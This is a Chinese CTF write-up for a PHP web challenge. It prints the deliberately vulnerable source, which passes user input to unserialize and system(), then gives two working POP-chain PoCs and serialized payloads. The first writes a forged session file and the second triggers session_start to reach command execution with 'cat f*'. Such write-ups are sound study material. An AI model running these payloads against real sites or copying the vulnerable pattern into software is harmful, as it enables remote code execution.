题目给了源码和phpinfo()
<?php
class a{
public function __get($a){
$this->b->love();
}
}
class b{
public function __destruct(){
$tmp = $this->c->name;
}
public function __wakeup(){
$this->c = "no!";
$this->b = $this->a;
}
}
class xk{
public function love(){
$a = $this->mylove;
}
public function __get($a){
if(preg_match("/\.|\.php/",$this->man)){
die("文件名不能有.");
}
file_put_contents($this->man,base64_decode($this->woman));
}
}
class end{
public function love(){
($this->func)();
}
}
if(isset($_GET['pop']))
{
unserialize($_GET['pop']);
if(preg_match("/N$/",$_GET['test'])){
$tmp = $_GET['test'];
}
}
else{
show_source(__FILE__);
phpinfo();
}
if($$tmp['name']=='your are good!'){
echo 'ok!';
system($_GET['shell']);
题目思路:
file_put_contents($this->man,base64_decode($this->woman));
和
class end{ public function love(){ ($this->func)(); } }
一个写文件,一个session_start()
配合
分两步走
1、通过自己写session文件
2、然后读取,从而执行命令
第一步:
写session文件
链子:b--->a--->xk
poc
<?php
class a{
public function __get($a){
$this->b->love();
}
}
class b{
public function __destruct(){
$tmp = $this->c->name;
}
public function __wakeup(){
$this->c = "no!";
$this->b = $this->a;
}
}
class xk{
public function love(){
$a = $this->mylove;
}
public function __get($a){
if(preg_match("/\.|\.php/",$this->man)){
die("文件名不能有.");
}
file_put_contents($this->man,base64_decode($this->woman));
}
}
class end{
public function love(){
($this->func)();
}
}
if(isset($_GET['pop']))
{
unserialize($_GET['pop']);
if(preg_match("/N$/",$_GET['test'])){
$tmp = $_GET['test'];
}
}
else{
show_source(__FILE__);
phpinfo();
}
if($$tmp['name']=='your are good!'){
echo 'ok!';
system($_GET['shell']);
}
$ctf = new b();
$ctf ->a = new a();
$ctf ->a -> b = new xk();
$ctf ->c = &$ctf->b;
//上面是通过引用变量绕过wakeup中的this->$c="no",因为wakeup要让c是一个对象,才能利用这句$tmp = $this->c->name;跳转
//下面是session文件的路径以及写入的内容
$ctf-> a -> b -> man = "/var/lib/php/session/sess_1"; //phpinfo获取
$ctf-> a -> b -> woman ="bmFtZXxzOjE0OiJ5b3VyIGFyZSBnb29kISI7";// name|s:14:"your are good!";
//phpinfo获取处理器为php
echo serialize($ctf);
payload
?pop=O:1:"b":3:{s:1:"a";O:1:"a":1:{s:1:"b";O:2:"xk":2:{s:3:"man";s:27:"/var/lib/php/session/sess_1";s:5:"woman";s:36:"bmFtZXxzOjE0OiJ5b3VyIGFyZSBnb29kISI7";}}s:1:"b";N;s:1:"c";R:6;}
第二步:
通过读取session文件
绕过if($$tmp['name']=='your are good!')
然后就有system了
poc
<?php
class a{
public function __get($a){
$this->b->love();
}
}
class b{
public function __destruct(){
$tmp = $this->c->name;
}
public function __wakeup(){
$this->c = "no!";
$this->b = $this->a;
}
}
class xk{
public function love(){
$a = $this->mylove;
}
public function __get($a){
if(preg_match("/\.|\.php/",$this->man)){
die("文件名不能有.");
}
file_put_contents($this->man,base64_decode($this->woman));
}
}
class end{
public function love(){
($this->func)();
}
}
if(isset($_GET['pop']))
{
unserialize($_GET['pop']);
if(preg_match("/N$/",$_GET['test'])){
$tmp = $_GET['test'];
}
}
else{
show_source(__FILE__);
phpinfo();
}
if($$tmp['name']=='your are good!'){
echo 'ok!';
system($_GET['shell']);
}
$ctfer = new b();
$ctfer ->a = new a();
$ctfer ->a -> b = new end();
$ctfer ->c = &$ctfer->b;
$ctfer ->a -> b-> func ='session_start';
echo serialize($ctfer);
payload
url
?pop=O:1:"b":3:{s:1:"a";O:1:"a":1:{s:1:"b";O:3:"end":1:{s:4:"func";s:13:"session_start";}}s:1:"b";N;s:1:"c";R:5;}&test=_SESSION&shell=cat+f*
test=_SESSION ---> $_SESSION 读取序列化文件数据,也就是刚才第一步写入的 your are good!
cookie
PHPSESSID=1
因为前面第一步的时候
$ctf-> a -> b -> man = "/var/lib/php/session/sess_1";
这一句我们定义的session文件名是1
标签:function,web,GET,__,mylove,session,帕鲁杯,tmp,public From: https://www.cnblogs.com/xjrycd/p/18164716